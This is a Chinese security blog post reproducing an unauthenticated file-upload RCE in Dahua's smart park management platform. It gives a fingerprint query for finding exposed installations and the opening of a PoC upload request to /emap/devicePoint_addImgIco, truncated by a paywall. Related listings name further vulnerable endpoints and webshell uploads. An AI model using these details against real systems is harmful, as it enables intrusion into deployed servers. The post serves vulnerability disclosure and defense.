大华智慧园区综合管理平台RCE漏洞复现(0day)

已于 2023-07-15 17:36:23 修改
阅读量4.6k 收藏 5
点赞数 9
分类专栏: 漏洞复现 文章标签: 安全 web安全 网络安全
于 2023-07-15 17:24:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/131740622
版权
本文详细介绍了大华智慧园区综合管理平台的远程代码执行(RCE)0day漏洞,该漏洞源于文件上传功能的不安全配置,攻击者可构造恶意文件执行任意命令。文章涵盖漏洞概述、复现环境、复现步骤及修复建议,提醒用户及时打补丁并限制访问来源,以防平台暴露于不安全网络中。
摘要由CSDN通过智能技术生成

0x01 产品简介

      “大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

0x02 漏洞概述

     大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上,然后利用该漏洞获取权限并执行任意命令。

0x03 复现环境

鹰图指纹:web.body="/WPMS/asset/lib/gridster/"

 0x04 漏洞复现

 出现以上情况则存在漏洞

 PoC

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0

--A9-oH6XdEkeyrNu4cNSk-ppZB059o
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 9
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 8
    评论
专栏目录
订阅专栏
【1day】复现大华智慧园区综合管理平台任意文件上传漏洞
记录并分享学习安全的知识点..
07-07 1264
大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。攻击者可以在前台将文件上传至其文件系统,但这些文件可能并没有经过充分的验证,如文件名称、类型、内容或大小等。未能正确执行这些限制就意味着即使最基本的图像上传功能也可能用于上传任意具有潜在危险的文件,里面甚至包括远程代码执行的服务器端脚本文件。
大华智慧园区综合管理平台任意文件上传漏洞
xiaokp7的博客
07-30 1186
智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台存在文件上传漏洞,攻击者可以通过请求/emap/devicePoint_addImgIco接口任意上传文件,导致系统被攻击与控制。
大华智慧园区综合管理平台 getNewStaypointDetailQuery SQL注入漏洞
qq_36334672的博客
03-28 333
大华综合管理平台”是一款综合管理平台,具备园区运营、和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。​ 由于大华综合管理平台getNewStaypointDetailQuery接口处未对用户的输入进行过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。
DH-DSS-H8900智慧园区综合管理平台
03-01
DH-DSS-H8900 系列是为通用性公共建筑物提供安全和高效管理而打造的智慧园区综合管理平台,通过融合大华在安防和智能化领域的专业经验和前沿技术,集成视频,门禁、报警,停车场,考 勤,访客,可视对讲,信息发布等多个业务 支持可视对讲,门禁一卡通、停车场管理  通过对讲设备管理,实现户户通话,室内报警联动,信息发布等功能  通过门禁管理,实现门禁的开关门,并实现门禁和视频的联动  通过卡口、道闸、LED 设备管理,实现出入口的综合性智能化管理  实现多设备、多路通道、多窗口的实时监控和预览  支持双目监控  支持鱼球联动  支持 36 路录像查询和回放  支持监控计划任务定制,多路多窗口视频轮巡、同时回放  支持本地抓图及本地录像  支持语音对讲  通过接入报警主机,实现报警管理  支持报警联动配置,弹出联动视频、查看多设备报警提示、录像信息功能 支持智能设备应用 支持智能跟踪、人数统计、主从跟随、特征识别、守望者、人脸识别等智能设备应用  通过配置电子地图,随时定位设备,从而轻松地部署管理  视频上墙,配置简单  通过配置巡更点、巡更路线,实现巡更管理
大华智慧园区综合管理平台 任意文件读取漏洞复现
10-10 1177
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
大华智慧园区综合管理平台SQL注入漏洞复现
0xSec
08-10 2399
大华智慧园区综合管理平台未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。
大华城市安防监控系统平台管理存在任意文件下载漏洞
剁椒鱼头没剁椒的博客
02-14 2881
大华城市安防监控系统平台管理存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。刷新登录页面进行抓包,然后在数据包中添加POC。大华城市安防监控系统平台管理
漏洞复现|大华智慧园区综合管理平台存在未授权高危漏洞0Day)及以往漏洞合集
weixin_44217321的博客
02-27 1666
大华智慧园区综合管理平台客户端由于前台缺少访问控制授权措施,可以从ip/WPMS进行定位,借助Payload进行漏洞触发,从而达到获取服务器数据的影响。大华园区综合管理平台/emap/webservice/gis/soap/bitmap接口处存在任意文件上传漏洞,恶意攻击者可能会上传后门文件,造成服务器失陷。大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上,然后利用该漏洞获取权限并执行任意命令。
漏洞复现大华智慧园区综合管理平台任意密码读取
2201_75756681的博客
01-05 635
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
核弹级漏洞通告 _ Spring RCE 0day漏洞_0day安全
09-22
继2021年底由阿里发现的Log4j的严重漏洞之后, Spring框架也被发现了一个重大的安全漏洞。目前这个漏洞的名称被称为“SpringShell: Spring Core RCE 0-day Vulnerability”
漏洞复现大华智慧园区综合管理平台信息泄露漏洞
晚风不及你
03-11 778
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台旨在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
大华智慧园区综合管理平台RCE漏洞
holyxp的博客
07-17 2014
大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。​ 大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上,然后利用该漏洞获取权限并执行任意命令。
大华智慧园区综合管理平台文件上传漏洞(CVE-2023-3836)
weixin_44304678的博客
11-01 1499
大华智慧园区综合管理平台是一个基于智能物联技术的园区安防、办公、运营的数字化解决方案。大华智慧园区综合管理平台(截至 20230713)版本中存在文件上传漏洞。未经授权的攻击者可以上传恶意Webshell的JSP文件,可以进行RCE利用。未经授权的攻击者可通过上传jsp的webshell造成rce,获取服务器权限。app=“dahua-智慧园区综合管理平台”123可修改为webshell。
大华智慧园区综合管理平台存在任意文件上传漏洞
nnn2188185的博客
07-18 908
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上。
大华智慧园区综合管理平台任意密码读取漏洞复现
08-14 2257
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
大华智慧园区综合管理平台任意文件上传[附POC]
Liyu_6618的博客
02-01 583
拒绝知识星球付费POC免责声明:本文章仅用于信息安全防御技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁止做一切违法犯罪行为。
OV SSL证书:增强网站信任与安全的重要保障
最新发布
alsknv的博客
08-20 1308
OV SSL证书,全称为Organization Validation SSL证书,是一种需要通过验证网站或组织真实身份才能颁发的SSL证书。它不仅能为网站提供数据传输的加密功能,还能向用户展示网站的真实身份,增强用户的信任感。OV证书适用于所有需要在线信任和安全的网站,特别是电子商务网站、在线银行、金融机构以及企业门户网站等。OV SSL证书_企业验证级SSL证书-JoySSLOV是英文单词Organization Validation的缩写,即单位组织信息验证。
大华智慧园区综合管理平台rce
08-17
大华智慧园区综合管理平台RCE)是一种基于大数据和人工智能技术的智慧园区管理解决方案。该平台集成了多个子系统,包括智能安防、能源管理、楼宇自动化、智慧交通等,旨在提供全面的园区管理和优化,促进园区的可持续发展。 RCE平台通过监测和收集园区各个系统的数据,实现了全面的实时监控和管理。例如,通过智能安防子系统,可以对园区内的视频监控和入侵报警进行集中管理和分析,及时发现和应对安全事件。能源管理子系统可以帮助园区实现能源使用的监测和调控,提高能源利用效率,减少能源浪费。楼宇自动化子系统可以实现对园区内各个建筑物的智能控制和设备管理,提高建筑物的舒适度和能源效率。智慧交通子系统则可以优化园区的交通流动性,减少交通堵塞和碰撞事故。 RCE平台还具有数据分析和预测功能,利用大数据和人工智能技术,对园区内各个子系统的数据进行分析和挖掘,提供决策支持和优化方案。例如,可以通过数据分析预测出园区能源的高峰和低谷,从而合理调控能源供应。还可以通过交通数据分析,优化园区的道路规划和交通流量,提高交通效率和安全性。 综上所述,大华智慧园区综合管理平台RCE)通过集成不同子系统和应用,实现了园区的全面管理和优化,提高了园区的安全性、舒适度和效率。它是未来智慧城市建设的重要组成部分,也是推动城市可持续发展的重要工具。
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值